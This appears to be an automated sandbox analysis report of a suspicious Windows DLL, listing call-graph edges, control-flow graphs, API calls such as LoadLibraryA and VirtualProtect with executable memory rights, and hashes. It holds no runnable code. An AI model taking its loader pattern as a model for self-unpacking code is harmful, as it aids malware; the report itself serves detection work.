20442->20433 20442->20439 20443->20441 20446 6fa64f5f 20444->20446 20447 6fa64f4b WideCharToMultiByte 20444->20447 20445->20433 20448 6fa5a608 __calloc_crt 62 API calls 20446->20448 20447->20441 20447->20446 20449 6fa64f67 20448->20449 20449->20441 20450 6fa64f70 WideCharToMultiByte 20449->20450 20450->20441 20451 6fa64f82 20450->20451 20452 6fa54618 __freebuf 62 API calls 20451->20452 20452->20441 20454 6fa61da0 LCMapStringW 20453->20454 20458 6fa61dbb 20453->20458 20455 6fa61dc3 GetLastError 20454->20455 20454->20458 20455->20458 20456 6fa61fb9 20460 6fa64dbc ___ansicp 86 API calls 20456->20460 20457 6fa61e15 20459 6fa61e2e MultiByteToWideChar 20457->20459 20477 6fa61fb0 20457->20477 20458->20456 20458->20457 20461 6fa61e5b 20459->20461 20459->20477 20463 6fa61fe1 20460->20463 20470 6fa549fe _malloc 62 API calls 20461->20470 20481 6fa61e74 __crtLCMapStringA_stat 20461->20481 20462 6fa53f34 ___strgtold12_l 5 API calls 20464 6fa5fd3c 20462->20464 20465 6fa620d5 LCMapStringA 20463->20465 20466 6fa61ffa 20463->20466 20463->20477 20464->20383 20469 6fa62031 20465->20469 20467 6fa64e05 ___convertcp 69 API calls 20466->20467 20471 6fa6200c 20467->20471 20468 6fa61eac MultiByteToWideChar 20472 6fa61ec5 LCMapStringW 20468->20472 20473 6fa61fa7 20468->20473 20474 6fa620fc 20469->20474 20475 6fa54618 __freebuf 62 API calls 20469->20475 20470->20481 20476 6fa62016 LCMapStringA 20471->20476 20471->20477 20472->20473 20479 6fa61ee6 20472->20479 20478 6fa61006 __freea 62 API calls 20473->20478 20474->20477 20482 6fa54618 __freebuf 62 API calls 20474->20482 20475->20474 20476->20469 20485 6fa62038 20476->20485 20477->20462 20478->20477 20480 6fa61eef 20479->20480 20484 6fa61f18 20479->20484 20480->20473 20483 6fa61f01 LCMapStringW 20480->20483 20481->20468 20481->20477 20482->20477 20483->20473 20487 6fa61f33 __crtLCMapStringA_stat 20484->20487 20489 6fa549fe _malloc 62 API calls 20484->20489 20488 6fa62049 _memset __crtLCMapStringA_stat 20485->20488 20490 6fa549fe _malloc 62 API calls 20485->20490 20486 6fa61f67 LCMapStringW 20491 6fa61fa1 20486->20491 20492 6fa61f7f WideCharToMultiByte 20486->20492 20487->20473 20487->20486 20488->20469 20494 6fa62087 LCMapStringA 20488->20494 20489->20487 20490->20488 20493 6fa61006 __freea 62 API calls 20491->20493 20492->20491 20493->20473 20496 6fa620a7 20494->20496 20497 6fa620a3 20494->20497 20498 6fa64e05 ___convertcp 69 API calls 20496->20498 20499 6fa61006 __freea 62 API calls 20497->20499 20498->20497 20499->20469 20500->20373 20502 6fa5df88 20501->20502 20503 6fa59fb8 __encode_pointer 6 API calls 20502->20503 20504 6fa5dfa0 20502->20504 20503->20502 20504->20154 20508 6fa54478 20505->20508 20507 6fa544c1 20507->20156 20509 6fa54484 __freefls@4 20508->20509 20516 6fa55c6b 20509->20516 20515 6fa544a5 __freefls@4 20515->20507 20517 6fa5a914 __lock 62 API calls 20516->20517 20518 6fa54489 20517->20518 20519 6fa5438d 20518->20519 20520 6fa5a033 __decode_pointer 6 API calls 20519->20520 20521 6fa543a1 20520->20521 20522 6fa5a033 __decode_pointer 6 API calls 20521->20522 20523 6fa543b1 20522->20523 20524 6fa57637 __recalloc 63 API calls 20523->20524 20534 6fa54434 20523->20534 20526 6fa543cf 20524->20526 20525 6fa5441b 20527 6fa59fb8 __encode_pointer 6 API calls 20525->20527 20526->20525 20529 6fa543f9 20526->20529 20530 6fa543ea 20526->20530 20528 6fa54429 20527->20528 20531 6fa59fb8 __encode_pointer 6 API calls 20528->20531 20533 6fa543f3 20529->20533 20529->20534 20542 6fa5a654 20530->20542 20531->20534 20533->20529 20535 6fa5a654 __realloc_crt 72 API calls 20533->20535 20536 6fa5440f 20533->20536 20539 6fa544ae 20534->20539 20537 6fa54409 20535->20537 20538 6fa59fb8 __encode_pointer 6 API calls 20536->20538 20537->20534 20537->20536 20538->20525 20547 6fa55c74 20539->20547 20544 6fa5a65d 20542->20544 20543 6fa54ac8 _realloc 71 API calls 20543->20544 20544->20543 20545 6fa5a69c 20544->20545 20546 6fa5a67d Sleep 20544->20546 20545->20533 20546->20544 20550 6fa5a83a LeaveCriticalSection 20547->20550 20549 6fa544b3 20549->20515 20550->20549 20552 6fa55d4f __freefls@4 20551->20552 20553 6fa5a914 __lock 62 API calls 20552->20553 20554 6fa55d56 20553->20554 20557 6fa5a033 __decode_pointer 6 API calls 20554->20557 20561 6fa55e0f __initterm 20554->20561 20559 6fa55d8d 20557->20559 20558 6fa55e57 __freefls@4 20558->20181 20559->20561 20563 6fa5a033 __decode_pointer 6 API calls 20559->20563 20568 6fa55e5a 20561->20568 20562 6fa55e4e 20564 6fa55c53 _malloc 3 API calls 20562->20564 20566 6fa55da2 20563->20566 20564->20558 20565 6fa5a02a 6 API calls __init_pointers 20565->20566 20566->20561 20566->20565 20567 6fa5a033 6 API calls __decode_pointer 20566->20567 20567->20566 20569 6fa55e60 20568->20569 20570 6fa55e3b 20568->20570 20573 6fa5a83a LeaveCriticalSection 20569->20573 20570->20558 20572 6fa5a83a LeaveCriticalSection 20570->20572 20572->20562 20573->20570 20575 6fa5a2a5 __freefls@4 20574->20575 20576 6fa5a3a7 __freefls@4 20575->20576 20577 6fa54618 __freebuf 62 API calls 20575->20577 20578 6fa5a2bd 20575->20578 20576->20184 20577->20578 20579 6fa5a2cb 20578->20579 20580 6fa54618 __freebuf 62 API calls 20578->20580 20581 6fa5a2d9 20579->20581 20583 6fa54618 __freebuf 62 API calls 20579->20583 20580->20579 20582 6fa5a2e7 20581->20582 20584 6fa54618 __freebuf 62 API calls 20581->20584 20585 6fa5a2f5 20582->20585 20586 6fa54618 __freebuf 62 API calls 20582->20586 20583->20581 20584->20582 20587 6fa5a303 20585->20587 20588 6fa54618 __freebuf 62 API calls 20585->20588 20586->20585 20589 6fa5a311 20587->20589 20591 6fa54618 __freebuf 62 API calls 20587->20591 20588->20587 20590 6fa5a322 20589->20590 20592 6fa54618 __freebuf 62 API calls 20589->20592 20593 6fa5a914 __lock 62 API calls 20590->20593 20591->20589 20592->20590 20594 6fa5a32a 20593->20594 20595 6fa5a336 InterlockedDecrement 20594->20595 20596 6fa5a34f 20594->20596 20595->20596 20597 6fa5a341 20595->20597 20610 6fa5a3b3 20596->20610 20597->20596 20600 6fa54618 __freebuf 62 API calls 20597->20600 20600->20596 20601 6fa5a914 __lock 62 API calls 20602 6fa5a363 20601->20602 20603 6fa5a394 20602->20603 20604 6fa604a3 ___removelocaleref 8 API calls 20602->20604 20613 6fa5a3bf 20603->20613 20608 6fa5a378 20604->20608 20607 6fa54618 __freebuf 62 API calls 20607->20576 20608->20603 20609 6fa602cb ___freetlocinfo 62 API calls 20608->20609 20609->20603 20616 6fa5a83a LeaveCriticalSection 20610->20616 20612 6fa5a35c 20612->20601 20617 6fa5a83a LeaveCriticalSection 20613->20617 20615 6fa5a3a1 20615->20607 20616->20612 20617->20615

                                          Executed Functions

                                          Function 6FA463F0 Relevance: 4.7, APIs: 3, Instructions: 239memorylibraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 25 6fa463f0-6fa463f8 26 6fa4649c-6fa464c1 25->26 27 6fa463fe-6fa4640f 25->27 28 6fa46524 26->28 29 6fa464c3 26->29 30 6fa46413-6fa4641e 27->30 31 6fa46526-6fa46551 28->31 32 6fa464c5-6fa464cb 29->32 33 6fa46420 30->33 34 6fa46481 30->34 38 6fa46557-6fa46568 31->38 39 6fa465f1 31->39 32->32 36 6fa464cd-6fa464cf 32->36 37 6fa46422-6fa46427 33->37 35 6fa46483-6fa46487 34->35 41 6fa4648d-6fa46492 35->41 42 6fa4671b-6fa4671e 35->42 36->28 43 6fa464d1-6fa464d7 36->43 37->37 45 6fa46429-6fa4642b 37->45 40 6fa4656c-6fa46577 38->40 44 6fa465f3-6fa46661 LoadLibraryA VirtualProtect call 6fa467f8 VirtualProtect 39->44 46 6fa46579 40->46 47 6fa465da 40->47 41->30 48 6fa46498 41->48 49 6fa466f0 43->49 50 6fa464dd-6fa464e6 43->50 64 6fa46682-6fa466a9 44->64 65 6fa46663 44->65 45->34 52 6fa4642d-6fa46433 45->52 53 6fa4657b-6fa46580 46->53 54 6fa465dc-6fa465e0 47->54 48->26 55 6fa464ea-6fa46501 50->55 57 6fa466e6 52->57 58 6fa46439-6fa46443 52->58 53->53 60 6fa46582-6fa46584 53->60 61 6fa46704-6fa46716 54->61 62 6fa465e6-6fa465eb 54->62 55->55 63 6fa46503-6fa46513 55->63 69 6fa466fa 57->69 59 6fa46447-6fa4645e 58->59 59->59 67 6fa46460-6fa46471 59->67 60->47 68 6fa46586-6fa4658c 60->68 61->44 62->39 62->40 63->31 70 6fa46515-6fa46522 63->70 66 6fa46667-6fa46680 65->66 66->64 66->66 67->35 71 6fa46473-6fa4647f 67->71 68->69 73 6fa46592-6fa4659c 68->73 69->61 70->31 71->35 74 6fa465a0-6fa465b7 73->74 74->74 75 6fa465b9-6fa465ca 74->75 75->54 76 6fa465cc-6fa465d8 75->76 76->54
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FA46602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FA4663B
                                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FA46654
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$LibraryLoad
                                          • String ID:
                                          • API String ID: 895956442-0
                                          • Opcode ID: 22dec76dfd963adef61e853e7d269b75f81a611500095538f556627ce03cc013
                                          • Instruction ID: 8e06d585e9b6ba87e0044319e79a531e24cdaaf6f7d0db9edb1164865b3be414
                                          • Opcode Fuzzy Hash: 22dec76dfd963adef61e853e7d269b75f81a611500095538f556627ce03cc013
                                          • Instruction Fuzzy Hash: 3EA1EF305087558FC715CF29C59062AFBE6BFCA304F09896EE89597306D734F996CB82
                                          Function 6FA45CA0 Relevance: 3.4, APIs: 2, Instructions: 353COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 105 6fa45ca0-6fa45d95 call 6fa4af9c * 2 call 6fa4afc3 * 2 call 6fa464e0 GetPEB 116 6fa45de4 105->116 117 6fa45d97 105->117 119 6fa45de6-6fa45e1d 116->119 118 6fa45d99-6fa45da3 117->118 120 6fa45da5-6fa45dab 118->120 121 6fa45dd6-6fa45dd8 118->121 122 6fa45e23-6fa45e3c 119->122 123 6fa45eba-6fa45f0c GlobalAlloc 119->123 125 6fa45dae-6fa45db5 120->125 126 6fa467e1-6fa467e4 121->126 127 6fa45dde-6fa45de2 121->127 124 6fa45e40-6fa45e4e 122->124 128 6fa45f12-6fa45f2b 123->128 129 6fa45fad 123->129 134 6fa45e50 124->134 135 6fa45ea3 124->135 130 6fa45db7-6fa45dbd 125->130 131 6fa45dc1-6fa45dcd 125->131 126->119 127->116 127->118 133 6fa45f2f-6fa45f3d 128->133 132 6fa45faf-6fa45fce 129->132 130->131 137 6fa45dbf 130->137 131->125 139 6fa45dcf-6fa45dd3 131->139 148 6fa45fe7-6fa45fea 132->148 149 6fa45fd0 132->149 141 6fa45f92 133->141 142 6fa45f3f 133->142 136 6fa45e52-6fa45e58 134->136 138 6fa45ea5-6fa45ea9 135->138 136->136 144 6fa45e5a-6fa45e5c 136->144 137->131 146 6fa467c3-6fa467dc 138->146 147 6fa45eaf-6fa45eb4 138->147 139->121 145 6fa45f94-6fa45f98 141->145 143 6fa45f41-6fa45f47 142->143 143->143 150 6fa45f49-6fa45f4b 143->150 144->135 151 6fa45e5e-6fa45e64 144->151 152 6fa467a5-6fa467be 145->152 153 6fa45f9e-6fa45fa3 145->153 147->124 155 6fa45eb6 147->155 157 6fa45fec 148->157 158 6fa45ffe-6fa46038 148->158 156 6fa45fd2-6fa45fe5 149->156 150->141 161 6fa45f4d-6fa45f53 150->161 162 6fa466aa-6fa466af 151->162 163 6fa45e6a-6fa45e6e 151->163 152->132 153->133 164 6fa45fa5-6fa45fa9 153->164 155->123 156->148 156->156 165 6fa45fee-6fa45ffc 157->165 159 6fa4603e-6fa46057 158->159 160 6fa460d9 158->160 166 6fa4605b-6fa46069 159->166 171 6fa460db-6fa460ef 160->171 168 6fa466b4 161->168 169 6fa45f59-6fa45f5d 161->169 167 6fa45e90-6fa45e95 162->167 170 6fa45e70-6fa45e86 163->170 164->129 165->158 165->165 172 6fa460be 166->172 173 6fa4606b 166->173 167->138 176 6fa45e97-6fa45ea1 167->176 178 6fa466be 168->178 174 6fa45f5f-6fa45f75 169->174 170->170 175 6fa45e88-6fa45e8c 170->175 180 6fa460c0-6fa460c4 172->180 177 6fa4606d-6fa46073 173->177 174->174 179 6fa45f77-6fa45f84 174->179 175->167 176->138 177->177 181 6fa46075-6fa46077 177->181 183 6fa46788-6fa467a0 178->183 179->145 182 6fa45f86-6fa45f90 179->182 180->183 184 6fa460ca-6fa460cf 180->184 181->172 185 6fa46079-6fa4607f 181->185 182->145 183->171 184->166 186 6fa460d1-6fa460d5 184->186 185->178 187 6fa46085-6fa46089 185->187 186->160 188 6fa4608b-6fa460a1 187->188 188->188 189 6fa460a3-6fa460b0 188->189 189->180 190 6fa460b2-6fa460bc 189->190 190->180
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoad_memset
                                          • String ID:
                                          • API String ID: 2997193564-0
                                          • Opcode ID: 2a72012180c450a880e7fd06fc76da2ea50228f30c978f1e1fe08d99d7c38a2e
                                          • Instruction ID: 63871a4e2ca9531b43d0cc59d617f637315fe29fc14592f129026df52db300e9
                                          • Opcode Fuzzy Hash: 2a72012180c450a880e7fd06fc76da2ea50228f30c978f1e1fe08d99d7c38a2e
                                          • Instruction Fuzzy Hash: B1E17BB49087068FC714CF1AC490A2AFBE5FF89314F54892EE89A87351D734F996CB91
                                          Function 6FA45E70 Relevance: 1.5, APIs: 1, Instructions: 248memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 351 6fa45e70-6fa45e86 351->351 352 6fa45e88-6fa45e8c 351->352 353 6fa45e90-6fa45e95 352->353 354 6fa45ea5-6fa45ea9 353->354 355 6fa45e97-6fa45ea1 353->355 356 6fa467c3-6fa467dc 354->356 357 6fa45eaf-6fa45eb4 354->357 355->354 359 6fa45eb6-6fa45f0c GlobalAlloc 357->359 360 6fa45e40-6fa45e4e 357->360 365 6fa45f12-6fa45f2b 359->365 366 6fa45fad 359->366 362 6fa45e50 360->362 363 6fa45ea3 360->363 364 6fa45e52-6fa45e58 362->364 363->354 364->364 367 6fa45e5a-6fa45e5c 364->367 369 6fa45f2f-6fa45f3d 365->369 368 6fa45faf-6fa45fce 366->368 367->363 370 6fa45e5e-6fa45e64 367->370 378 6fa45fe7-6fa45fea 368->378 379 6fa45fd0 368->379 372 6fa45f92 369->372 373 6fa45f3f 369->373 375 6fa466aa-6fa466af 370->375 376 6fa45e6a-6fa45e6e 370->376 377 6fa45f94-6fa45f98 372->377 374 6fa45f41-6fa45f47 373->374 374->374 380 6fa45f49-6fa45f4b 374->380 375->353 376->351 381 6fa467a5-6fa467be 377->381 382 6fa45f9e-6fa45fa3 377->382 384 6fa45fec 378->384 385 6fa45ffe-6fa46038 378->385 383 6fa45fd2-6fa45fe5 379->383 380->372 388 6fa45f4d-6fa45f53 380->388 381->368 382->369 389 6fa45fa5-6fa45fa9 382->389 383->378 383->383 390 6fa45fee-6fa45ffc 384->390 386 6fa4603e-6fa46057 385->386 387 6fa460d9 385->387 391 6fa4605b-6fa46069 386->391 394 6fa460db-6fa460ef 387->394 392 6fa466b4 388->392 393 6fa45f59-6fa45f5d 388->393 389->366 390->385 390->390 395 6fa460be 391->395 396 6fa4606b 391->396 399 6fa466be 392->399 397 6fa45f5f-6fa45f75 393->397 401 6fa460c0-6fa460c4 395->401 398 6fa4606d-6fa46073 396->398 397->397 400 6fa45f77-6fa45f84 397->400 398->398 402 6fa46075-6fa46077 398->402 404 6fa46788-6fa467a0 399->404 400->377 403 6fa45f86-6fa45f90 400->403 401->404 405 6fa460ca-6fa460cf 401->405 402->395 406 6fa46079-6fa4607f 402->406 403->377 404->394 405->391 407 6fa460d1-6fa460d5 405->407 406->399 408 6fa46085-6fa46089 406->408 407->387 409 6fa4608b-6fa460a1 408->409 409->409 410 6fa460a3-6fa460b0 409->410 410->401 411 6fa460b2-6fa460bc 410->411 411->401
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FA45ECA
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: 0dfeea2bb6be9c70cb3d999346b5ec5f955f6a8132bca538c4c5e5a986e8f6b7
                                          • Instruction ID: 4a22072adcb76c07ebbc940cd871af71fa8fc4ee5c09a7ceb0568ff338f01727
                                          • Opcode Fuzzy Hash: 0dfeea2bb6be9c70cb3d999346b5ec5f955f6a8132bca538c4c5e5a986e8f6b7
                                          • Instruction Fuzzy Hash: 69A18F746083168FC708CF2DC59062AF7E2BF89304F18C56EE89687356D774F9968B92
                                          Function 6FA4BC4E Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • EnterCriticalSection.KERNEL32(6FA732EC,?,?,?,6FA732D0,6FA732D0,?,6FA4C0A4,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4BC61
                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,6FA732D0,6FA732D0,?,6FA4C0A4,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4BCB7
                                          • GlobalHandle.KERNEL32(00D3AED0), ref: 6FA4BCC0
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6FA4BCCA
                                          • GlobalReAlloc.KERNEL32(6FA6C168,00000000,00002002), ref: 6FA4BCE3
                                          • GlobalHandle.KERNEL32(00D3AED0), ref: 6FA4BCF5
                                          • GlobalLock.KERNEL32(00000000), ref: 6FA4BCFC
                                          • LeaveCriticalSection.KERNEL32(?,?,?,6FA732D0,6FA732D0,?,6FA4C0A4,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4BD05
                                          • GlobalLock.KERNEL32(00000000), ref: 6FA4BD11
                                          • _memset.LIBCMT ref: 6FA4BD2B
                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 6FA4BD59
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                          • String ID:
                                          • API String ID: 496899490-0
                                          • Opcode ID: ba8f1c5bd9e154c17dd05b3a68a2702d8096952fdc3f418aa81c4e4b62309855
                                          • Instruction ID: dcc75797440139d1d153da24f27fc651e1eff347071ea67c9ae3bd75037614f5
                                          • Opcode Fuzzy Hash: ba8f1c5bd9e154c17dd05b3a68a2702d8096952fdc3f418aa81c4e4b62309855
                                          • Instruction Fuzzy Hash: B631CD71604B04AFDB20CF74C889A5EBBF9FF46354B048A6AE552D7280DB38F891CB50
                                          Function 6FA464E0 Relevance: 4.7, APIs: 3, Instructions: 151librarymemoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 77 6fa464e0-6fa464e8 78 6fa464ea-6fa46501 77->78 78->78 79 6fa46503-6fa46513 78->79 80 6fa46515-6fa46522 79->80 81 6fa46526-6fa46551 79->81 80->81 82 6fa46557-6fa46568 81->82 83 6fa465f1 81->83 84 6fa4656c-6fa46577 82->84 85 6fa465f3-6fa46661 LoadLibraryA VirtualProtect call 6fa467f8 VirtualProtect 83->85 86 6fa46579 84->86 87 6fa465da 84->87 95 6fa46682-6fa466a9 85->95 96 6fa46663 85->96 89 6fa4657b-6fa46580 86->89 90 6fa465dc-6fa465e0 87->90 89->89 92 6fa46582-6fa46584 89->92 93 6fa46704-6fa46716 90->93 94 6fa465e6-6fa465eb 90->94 92->87 98 6fa46586-6fa4658c 92->98 93->85 94->83 94->84 97 6fa46667-6fa46680 96->97 97->95 97->97 100 6fa46592-6fa4659c 98->100 101 6fa466fa 98->101 102 6fa465a0-6fa465b7 100->102 101->93 102->102 103 6fa465b9-6fa465ca 102->103 103->90 104 6fa465cc-6fa465d8 103->104 104->90
                                          APIs
                                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FA46602
                                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FA4663B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: LibraryLoadProtectVirtual
                                          • String ID:
                                          • API String ID: 3279857687-0
                                          • Opcode ID: c00cb2a00adec652a1d924a16ec15419391e07984e3a669432b3419006ed3d2f
                                          • Instruction ID: 4250b191b273d92c18ff70273aa533195f65dd3e719c3293b732aa87e0d3463a
                                          • Opcode Fuzzy Hash: c00cb2a00adec652a1d924a16ec15419391e07984e3a669432b3419006ed3d2f
                                          • Instruction Fuzzy Hash: 2351F3306083558FC715CF29C890A2AFBF6BFCA308F09896DE89547316C634F946CB96
                                          Function 6FA46750 Relevance: 1.6, APIs: 1, Instructions: 109fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 191 6fa46750-6fa46762 ReadFile 193 6fa461f0-6fa46207 191->193 194 6fa4630a-6fa46323 191->194 195 6fa46325-6fa46329 194->195 196 6fa4634d-6fa46368 194->196 198 6fa4632f 195->198 199 6fa46738 195->199 200 6fa4636a 196->200 201 6fa463cb 196->201 203 6fa46331-6fa4633c 198->203 199->191 204 6fa4636c-6fa46372 200->204 202 6fa463cd-6fa463ee 201->202 205 6fa466dc 202->205 203->203 206 6fa4633e-6fa46347 203->206 204->204 207 6fa46374-6fa46376 204->207 205->199 206->196 208 6fa46349 206->208 207->201 209 6fa46378-6fa4637e 207->209 208->196 209->205 210 6fa46384-6fa4638d 209->210 211 6fa46391-6fa463a8 210->211 211->211 212 6fa463aa-6fa463ba 211->212 212->202 213 6fa463bc-6fa463c9 212->213 213->202
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FA6C168), ref: 6FA46300
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmpDownload File
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 3bd791c42a7e11582e651b13e136f0c68bf9a8c4723c30d161376f4b6b231bc9
                                          • Instruction ID: 2fce241eed77fec2c8c294324a08100cd0bcaaa3b941433dbab2ede5035dc7b1
                                          • Opcode Fuzzy Hash: 3bd791c42a7e11582e651b13e136f0c68bf9a8c4723c30d161376f4b6b231bc9
                                          • Instruction Fuzzy Hash: C141CF356087558FC708CF19C890A7AF7E2FFC6324F18896DE88997316D635F8968B80
                                          Function 6FA462D0 Relevance: 1.6, APIs: 1, Instructions: 97fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 214 6fa462d0-6fa462d5 215 6fa46742-6fa4674e 214->215 216 6fa462db-6fa462e0 214->216 217 6fa462e2-6fa462f1 216->217 218 6fa4626d-6fa4627b 216->218 223 6fa462f3-6fa46304 ReadFile 217->223 220 6fa4627d 218->220 221 6fa462cf 218->221 224 6fa4627f-6fa46284 220->224 222 6fa462d1-6fa462d5 221->222 222->215 222->216 225 6fa461f0-6fa46207 223->225 226 6fa4630a-6fa46323 223->226 224->224 227 6fa46286-6fa46288 224->227 229 6fa46325-6fa46329 226->229 230 6fa4634d-6fa46368 226->230 227->221 228 6fa4628a-6fa46290 227->228 231 6fa46296-6fa4629a 228->231 232 6fa466d2 228->232 234 6fa4632f 229->234 235 6fa46738-6fa46762 229->235 236 6fa4636a 230->236 237 6fa463cb 230->237 238 6fa4629c-6fa462b2 231->238 232->215 240 6fa46331-6fa4633c 234->240 235->223 241 6fa4636c-6fa46372 236->241 239 6fa463cd-6fa463ee 237->239 238->238 242 6fa462b4-6fa462c1 238->242 243 6fa466dc 239->243 240->240 244 6fa4633e-6fa46347 240->244 241->241 246 6fa46374-6fa46376 241->246 242->222 247 6fa462c3-6fa462cd 242->247 243->235 244->230 248 6fa46349 244->248 246->237 249 6fa46378-6fa4637e 246->249 247->222 248->230 249->243 250 6fa46384-6fa4638d 249->250 251 6fa46391-6fa463a8 250->251 251->251 252 6fa463aa-6fa463ba 251->252 252->239 253 6fa463bc-6fa463c9 252->253 253->239
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FA6C168), ref: 6FA46300
                                          Memory Dump Source
